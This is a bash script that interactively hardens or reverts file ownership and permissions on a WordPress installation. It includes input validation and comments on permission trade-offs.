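#!/bin/bash
#
# Interactive WordPress permission helper.
#
# Prompts for the install path, the owning user and a shared group, then either
#   1) hardens: core 750/640, uploads 770/660, plugins and themes 775/664,
#      wp-config.php 600; or
#   2) reverts: 755/644 everywhere, wp-config.php 640.
# Ownership is set recursively to USER:GROUP in both modes.
#
# Any failing chown/chmod/find aborts the run, so the success message is only
# printed when every step actually completed.

set -euo pipefail

# Print a message to stderr and abort.
die() {
    printf '%s\n' "$*" >&2
    exit 1
}

# Print a non-fatal warning to stderr.
warn() {
    printf 'warning: %s\n' "$*" >&2
}

# Apply one mode to every directory and another to every regular file below $1.
# Arguments: $1 - directory, $2 - directory mode, $3 - file mode
apply_modes() {
    local dir=$1 dir_mode=$2 file_mode=$3
    find "$dir" -type d -exec chmod "$dir_mode" {} +
    find "$dir" -type f -exec chmod "$file_mode" {} +
}

echo "====================================="
echo " WordPress Hardening Script"
echo "====================================="

# --- Prompt for values ---
# '|| true' keeps the defaults usable when stdin hits EOF (read returns
# non-zero there, which would otherwise trip 'set -e').
read -rp "Enter WordPress install path [/var/www/html/wordpress]: " WP_PATH || true
WP_PATH=${WP_PATH:-/var/www/html/wordpress}

read -rp "Enter FTP/SSH user that owns WordPress files [wwwFtp]: " FTP_USER || true
FTP_USER=${FTP_USER:-wwwFtp}

read -rp "Enter site group name to share between users [wpgroup]: " SITE_GROUP || true
SITE_GROUP=${SITE_GROUP:-wpgroup}

# --- Validate before touching anything ---
# A typo in the path would otherwise hand a recursive chown/chmod the wrong
# tree, so insist on an existing directory and refuse the filesystem root.
[[ -d "$WP_PATH" ]] || die "❌ Not a directory: $WP_PATH"
# Canonicalise: resolves symlinks, '..' and trailing slashes, and yields an
# absolute path that can never be mistaken for an option by find/chown.
WP_PATH=$(CDPATH='' cd -- "$WP_PATH" && pwd -P) || die "❌ Cannot enter $WP_PATH"
[[ "$WP_PATH" != "/" ]] || die "❌ Refusing to operate on /"

id -u "$FTP_USER" >/dev/null 2>&1 || die "❌ Unknown user: $FTP_USER"
getent group "$SITE_GROUP" >/dev/null 2>&1 || die "❌ Unknown group: $SITE_GROUP"

if (( EUID != 0 )); then
    warn "not running as root; chown to $FTP_USER:$SITE_GROUP may fail"
fi

echo ""
echo "⚙️  Using configuration:"
echo "   WordPress path : $WP_PATH"
echo "   FTP user       : $FTP_USER"
echo "   Shared group   : $SITE_GROUP"
echo ""

# --- Choose mode ---
echo "Choose mode:"
echo "  1) Harden (secure core, safe uploads, updatable plugins/themes)"
echo "  2) Revert (reset to 755/644 everywhere)"
read -rp "Select [1/2]: " MODE || true

if [[ "$MODE" == "1" ]]; then
    echo "🔒 Applying HARDENING mode..."

    # --- Set ownership ---
    chown -R -- "$FTP_USER:$SITE_GROUP" "$WP_PATH"

    # --- Core WordPress files (no access for "other", no group write) ---
    # Run from inside the install so the prune pattern is the literal
    # ./wp-content: glob characters in the path cannot change the match and
    # siblings such as wp-content-old are hardened too. wp-content itself and
    # anything in it other than uploads/plugins/themes keep their current mode.
    echo "🔧 Securing core WordPress files..."
    (
        cd -- "$WP_PATH"
        find . -path ./wp-content -prune -o -type d -exec chmod 750 {} +
        find . -path ./wp-content -prune -o -type f -exec chmod 640 {} +
    )

    # --- Uploads (writable) ---
    # Group-writable by design. This script only sets permissions; blocking
    # script execution under uploads has to be done in the web server config.
    echo "🔧 Securing uploads directory..."
    if [[ -d "$WP_PATH/wp-content/uploads" ]]; then
        chown -R -- "$FTP_USER:$SITE_GROUP" "$WP_PATH/wp-content/uploads"
        apply_modes "$WP_PATH/wp-content/uploads" 770 660
    else
        warn "$WP_PATH/wp-content/uploads not found; skipped"
    fi

    # --- Plugins & Themes (writable for updates) ---
    # Trade-off: every account in SITE_GROUP can rewrite executable PHP here,
    # and "other" keeps read access. Keep the group membership minimal.
    echo "🔧 Configuring plugins & themes directories..."
    for sub in plugins themes; do
        if [[ -d "$WP_PATH/wp-content/$sub" ]]; then
            chown -R -- "$FTP_USER:$SITE_GROUP" "$WP_PATH/wp-content/$sub"
            apply_modes "$WP_PATH/wp-content/$sub" 775 664
        else
            warn "$WP_PATH/wp-content/$sub not found; skipped"
        fi
    done

    # --- Secure wp-config.php ---
    # NOTE(review): with owner FTP_USER and mode 600 only that user can read
    # the file. If PHP runs as a different account that merely shares
    # SITE_GROUP, the site cannot load its config -- confirm which user PHP
    # runs as (revert mode uses 640 for this file).
    echo "🔧 Securing wp-config.php..."
    if [[ -f "$WP_PATH/wp-config.php" ]]; then
        chmod 600 "$WP_PATH/wp-config.php"
    else
        warn "$WP_PATH/wp-config.php not found; skipped"
    fi

    echo ""
    echo "✅ Hardening applied successfully!"

elif [[ "$MODE" == "2" ]]; then
    echo "♻️  Reverting to classic 755/644..."

    # --- Reset ownership ---
    chown -R -- "$FTP_USER:$SITE_GROUP" "$WP_PATH"

    # --- Reset permissions ---
    apply_modes "$WP_PATH" 755 644

    # --- Reset wp-config.php to readable ---
    # Tightened again after the blanket 644 so "other" cannot read credentials.
    if [[ -f "$WP_PATH/wp-config.php" ]]; then
        chmod 640 "$WP_PATH/wp-config.php"
    else
        warn "$WP_PATH/wp-config.php not found; skipped"
    fi

    echo ""
    echo "✅ Revert completed successfully!"

else
    echo "❌ Invalid selection. Aborted."
    exit 1
fi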
